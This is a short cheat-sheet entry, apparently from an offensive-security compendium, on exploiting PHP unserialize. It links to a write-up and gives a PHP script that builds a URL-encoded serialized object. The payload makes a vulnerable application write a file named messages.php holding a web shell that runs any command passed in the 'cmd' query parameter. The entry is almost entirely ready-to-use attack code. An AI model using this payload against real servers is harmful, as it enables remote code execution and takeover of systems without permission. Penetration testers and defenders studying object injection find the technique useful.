killchain-compendium/exploit/web/php/unserialize.md

# Unserialize

* [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize/)

* Serialize via
```php
<?php
class FormSubmit {
    public $form_file = 'messages.php';
    public $message = '<?php
    if(isset($_GET[\'cmd\']))
    {
        system($_GET[\'cmd\']);
    }
?>';
}

print urlencode(serialize(new FormSubmit));
?>
```